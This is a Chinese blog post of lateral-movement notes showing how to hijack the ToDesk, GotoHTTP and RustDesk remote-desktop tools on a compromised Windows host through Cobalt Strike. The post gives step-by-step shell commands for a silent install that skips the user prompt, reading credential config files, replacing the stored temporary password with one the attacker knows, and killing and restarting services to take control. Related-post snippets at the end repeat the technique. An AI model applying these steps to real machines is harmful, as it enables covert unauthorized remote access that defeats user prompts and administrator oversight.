内网渗透ToDesk、GoToHTTP、RustDESK横向移动利用流程笔记

最新推荐文章于 2024-09-10 00:46:14 发布
最新推荐文章于 2024-09-10 00:46:14 发布
阅读量2.1k 收藏 22
点赞数 30
分类专栏: 内网渗透 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73062138/article/details/139535386
版权

目录

关于向日葵的声名:

利用ToDesk横向移动:

ToDesk介绍:

环境准备:

使用方法:

1.绕过首次安装弹窗

2.安装完成后自动运行,接下来查看配置文件

3.解决tempAuthPassEx加密的问题:

GoToHTTP横向移动:

使用方法:

1.运行exe文件

2.查看gotohttp.ini配置文件

3.使用浏览器进行连接:

利用RustDESK横向移动:

使用方法:

1.运行该程序

2.找到config配置文件

3.查看文件:命令:

4.创建文件进行替换。该方法和ToDesk相似,可以进行参考

5.上传文件:使用cs的File Browser进行替换

6.重启rustdesk

关于向日葵的声名:

向日葵官方已经禁止有漏洞的版本连接服务器,所以这个向日葵横向已经失效,在这里就不多赘述了。

利用ToDesk横向移动:

ToDesk介绍:

ToDesk是一款类似向日葵

的远程控制软件,但比向日葵、TV和AD更为流畅和稳定,它同样具备着内网穿透、文件 传输、云端同步和流量加密等功能 有绿色精简版和全功能版两个版本,支持的系统有:Winodws/Linux/MacOS/Android/iOS

环境准备:

本机:windows10  靶机:server 2019

本机软件准备:cobaltstrike 、ToDesk       靶机软件准备:ToDesk

使用方法:

1.绕过首次安装弹窗

当我们首次打开todesk软件,必然会出现一个弹窗,如下图所示:

我们可以使用如下指令进行绕过:

cs: shell ToDesk1.exe /S                       //官方给的静默安装,可以到达绕过的效果

2.安装完成后自动运行,接下来查看配置文件

在 C:\"Program Files (x86)"\ToDesk\ 的路径下会有一个config.ini文件,这个文件里面有着连接ToDesk的临时密码。我们使用如下指令进行查看:

cs: shell type C:\"Program Files (x86)"\ToDesk\config.ini

注意:tempAuthPassEx里面的临时密码是经过加密的,可以进行解密,但不建议(会需要很长的时间)下面介绍一个更简单的方法。

3.解决tempAuthPassEx加密的问题:

1.在自己的机器上也安装一个Todesk软件

 2.在本机上找到C:\"Program Files (x86)"\ToDesk\config.ini 的文件

并将它的临时密码记录下来。

再将自己的tempAuthPassEx替换到靶机上的tempAuthPassEx,就可以知道靶机上的临时密码了。

步骤一:

把靶机的tempAuthPassEx替换成自己的tempAuthPassEx,这点很重要。在使用cs中的File Browse进行文件的替换

在对比一下tempAuthPassEx是否被换掉:

shell type C:\"Program Files (x86)"\ToDesk\config.ini

步骤三:重启ToDesk即可

查找进程:

shell tasklist

删除ToDesk_Service.exe和ToDesk_Service.exe进程:

shell taskkill /pid 6696 /F
shell taskkill /pid 7764 /F

重启ToDesk:

shell C:\"Program Files (x86)"\ToDesk\ToDesk.exe

使用本机的临时密码登录即可。设备代码可以通过cs自带的VNC进行查看。

GoToHTTP横向移动:

介绍:

GotoHTTP工作在B2C模式。使用远程控制时,不必在每一台电脑上都安装远程软件。不管身处何处,有浏览器就能访问远程电脑。 即使公司网络管控,仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语音、远程摄像头、多显示器支持

下载地址:GotoHTTP - Free Download

使用方法:

前提条件:
使用cs或者其他文件上传的工具,将exe文件上传到目标机器。

1.运行exe文件

命令:

shell dir C:\Users\Administrator\Desktop\GotoHTTP_x64

它会在该目录下生成一个gotohttp.ini的配置文件

2.查看gotohttp.ini配置文件

命令:

shell type C:\Users\Administrator\Desktop\gotohttp.ini

可以看到文件中的连接地址、账号、密码

3.使用浏览器进行连接:

GotoHTTP - 在线远程控制平台

注意:现在是需要付费的

利用RustDESK横向移动:

介绍:
远程桌面软件,开箱即用,无需要任何配置,完美替代了TeamViewer。可以完全掌控数据,不用担心安全的问题。

下载地址:

rustdesk: 远程桌面软件 (gitee.com)

使用方法:

前提:

使用cs或者其他文件上传的工具,将exe文件上传到目标机器。

1.运行该程序
cs:shell rustdesk.exe //注意路径
2.找到config配置文件

该文件位置在:C:\Users\Administrator\AppData\Roaming\RustDesk\config

命令:

shell dir C:\Users\Administrator\AppData\Roaming\RustDesk\config
3.查看文件:
命令:
shell type C:\Users\Administrator\AppData\Roaming\RustDesk\config\RustDesk.toml

但需要注意:第一次运行rustdesk是没有密码的

4.创建文件进行替换。该方法和ToDesk相似,可以进行参考

5.上传文件:
使用cs的File Browser进行替换

检查文件是否被更改:

命令:

shell type C:\Users\Administrator\AppData\Roaming\RustDesk\config\RustDesk.toml

发现该文件的密码确实已被更改。

记住该文件中的id和password

6.重启rustdesk

查看进程:

shell tasklist

杀掉该进程:

shell taskkill /pid 7984 /F

再次启动restdesk程序:

shell rustdesk.exe  //注意路径

最后在本地进行连接即可

RLG_星辰
关注
专栏目录
内网渗透(三十一)之横向移动篇-利用远控工具todesk横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 863
ToDesk是一款类似向日葵的远程控制软件,但比向日葵、TV和AD更为流畅和稳定,它同样具备着内网穿透、文件传输、云端同步和流量加密等功能有绿色精简版和全功能版两个版本,支持的系统有:Winodws/Linux/MacOS/Android/iOS全功能版在双击运行、命令行执行时都会出现UAC弹窗和安装界面,这样非常容易被管理员发现,/S参数可以实现静默安装在我们的目标机器上成功完成了安装安装完成后自动运行,我们接下来要查看配置文件。
内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 559
GotoHTTP工作在B2C模式。使用远程控制时,您不必在每一台电脑上都安装远程软件。不管身处何处,有浏览器就能访问远程电脑。即使公司网络管控,仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语音、远程摄像头、多显示器支持GoToHTTP下载。
rustDesk远程软件,强的可怕
最新发布
刘登辉的博客
09-10 668
随后又增加了一个值班人员,我们两个同时连接一台电脑,同一向日葵账号下,不能同时连,通道数量只有一个,他连我就要下,十分不方便,于是一台机器开了两个远程软件,一个向日葵,一个todesk,当然todesk也是要开会员的。最近在做一个机房的远程运维,对面系统都是windows的,远程本来采用的向日葵,开两三个窗口就不能再多开了,没办法冲了年费瓜子会员,开通会员之后,确实好很多。体验了一两天,发现同时开两个远程电脑吃不消,就想能不能升级个会员,一看价格,算了,自己手作找技术方案吧~按照说明填写配置信息。
Todesk远程控制用于渗透初研究
Nolen_Alice的博客
09-19 1593
然后结果就是惊人的发现!再继续研究config.ini文件内的内容,下面还有很多行空白的,我再思考后认为这是我用微信扫码,登录了账号的原因,比如loginemail=、user=等都是空的,而手机号loginphone=是有的,正好对应了我的个人中心里的信息。再继续研究config.ini文件内的内容,下面还有很多行空白的,我再思考后认为这是我用微信扫码,登录了账号的原因,比如loginemail=、user=等都是空的,而手机号loginphone=是有的,正好对应了我的个人中心里的信息。
KKView远程控制: todesk内网穿透
shelutai的博客
03-15 1437
其全功能免费不限设备数量政策,在办公一族迅速传播,争相使用。其一键看远程桌面,一键打开远程手机电脑摄像头,无限制急速文件传输,远程终端,远程关机重启等39项功能彻底打破办公居家时间空间限制,实现连接自由,深受用户好评。Todesk内网穿透功能为用户提供了便捷、安全的远程访问体验,广泛应用于远程办公、技术支持、家庭娱乐等场景。其简单易用、安全可靠、高效稳定及跨平台支持等特点,使得Todesk成为远程访问领域的佼佼者。Todesk作为一款远程桌面控制软件,其内网穿透功能为用户提供了便捷、安全的远程访问体验。
内网渗透_远控
carmi的博客
06-05 1015
内网渗透_远控 ToDesk ToDesk_Lite 官方最新下载地址: https://dl.todesk.com/windows/ToDesk_Lite.exe 利用powershell建立http连接下载todesk_lite.exe PS C:\Users\Administrator\Desktop> powershell.exe -c Invoke-WebRequest -U...
利用TODESK渗透】绕过防火墙远控
热门推荐
Named1ess
03-13 1万+
TODESK文件夹中有一个config.ini文件,这其中 clientld=设备代码 tempAuthPassEx=临时密码 设备代码是明文,临时密码是加密过的,这里其实不需要直接去破解,可以通过更换config文件的方式尝试直接替换临时密码。 注:本文所有更改config.ini文件后都需要重启todesk! 当我们把主机的tempAuthPassEx放到靶机的tempAuthPassEx,则可以发现靶机的临时密码已经变成和主机一样的临时密码了。 在连接过后会有一个登录提示,下次可以..
内网使用rustdesk进行远程协助
gsl371的专栏
03-22 3615
内网没有互联网环境,没法使用互联网上有中继服务器的远程协助工具,如teamviewer、todesk、向日癸等;在内网进行远程维护可以自己搭建中继服务器,使用开源的rustdesk来实现。
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1338
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
ToDesk4.2.9
09-16
在本文中,我们将深入探讨ToDesk的功能、特性以及4.2.9版本中的亮点,帮助用户更好地理解和利用这款强大的工具。 首先,ToDesk的核心功能是提供安全、高效的远程桌面访问。它允许用户通过互联网连接到另一台设备,...
dotnet-NSmartProxy是一款免费的内网穿透工具采用NETCORE的全异步模式打造
08-15
NSmartProxy是一款免费的内网穿透工具。采用.NET CORE的全异步模式打造。
RustDesk - 免费远程桌面控制软件!流畅不限速/可自建服务器 (替代 TeamViewer/Todesk)
04-07
远程操控类软件并不少,比如推荐过的 ToDesk,还有老牌的 TeamViewer、向日葵、微软远程桌面、AnyDesk 等,但这些工具大多数商业化、免费限制多,或服务器在国外连接卡顿不流畅。但如果你还是想找一款“免费开源”的...
ToDesk2.0.4
09-16
- **TCP/IP协议**:ToDesk利用TCP/IP协议进行网络通信,确保数据包的可靠传输。 - **加密技术**:通常使用SSL/TLS等加密协议来保护数据,防止被窃听或篡改。 - **屏幕编码与解码**:远程桌面软件需要将远程计算机...
rustdesk自建内网服务器,映射到外网固定ip
zhangzyok的博客
05-16 5074
自建内网rustdesk中继服务器,并映射到外网固定ip地址
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
m0_62207170的博客
05-18 1021
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
《树莓派4B家庭服务器搭建指南》第二十一期:安装开源远程桌面服务rustdesk, 内网丝滑,外网流畅控制
zhaoolee的CSDN博客
09-12 3315
title: 《树莓派4B家庭服务器搭建指南》第二十一期:安装开源远程桌面服务rustdesk, 内网丝滑,外网流畅控制Windows,macOS,Linux设备前段时间, 有一台老式MacBook Pro被我改造成了影视资源解码主机,, 我想通过远程桌面访问这台MacBook Pro, 发现Mac虽然原生支持VNC连接,但实际用起来经常画面撕裂,于是我找了一款开源的远程桌面程序rustdesk, 将其服务部署在树莓派上,实现局域网设备丝滑访问, 外网设备也可以通过内网穿透直接访问macOS。
内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 734
远程桌面软件,开箱即用,无需任何配置,完美替代TeamViewer。您完全掌控数据,不用担心安全问题。使用我们的注册/中继服务器,或者自己设置,亦或者开发您的版本。可以看到没有密码,这个时候需要手写这个密码,然后重启工具。我们将这段内容复制下来,然后再本地新建一个文本文件。我们再回头查看一下我们的配置文件,发现已经被替换了。然后写上我们的密码,注意这里的密码一定要6位。然后我们再去查看配置文件,密码就被显示出来了。然后将文件上传到目标机器进行替换。通过cs上传到目标机器。
两台外网计算机远程桌面访问(内网穿透
AI_eye的博客
06-28 2264
内网穿透,外网计算机远程桌面
todesk4.2.9
08-12
todesk是一种项目管理软件,版本号4.2.9表示该软件的具体版本。todesk是一款专门用于团队协作和项目管理的工具,它可以帮助团队成员之间更好地协同工作,提高工作效率。 todesk4.2.9版本可能会带来一些新的功能和改进。例如,它可能提供更好的任务分配和跟踪功能,使团队成员能够清晰地了解自己的工作任务,并及时汇报进度。此外,这个版本可能还增加了更多的报告和分析功能,使项目经理能够更好地监控项目进展并作出及时的决策。 另外,todesk4.2.9版本还可能修复了一些已知的bug和问题,增强了系统的稳定性和安全性。这将使用户在使用软件时更加顺畅,减少了不必要的错误和障碍。 对于团队成员来说,todesk4.2.9版本的更新可能需要一些时间来适应新的功能和界面。因此,可能需要一些培训和指导来帮助他们熟悉并最大化利用软件的功能。 总的来说,todesk4.2.9版本带来了一些新的功能和改进,可以进一步提高团队协作和项目管理的效率。对于使用todesk的团队来说,及时升级到新版本,并合理利用新功能,将有助于项目的顺利进行和取得更好的成果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值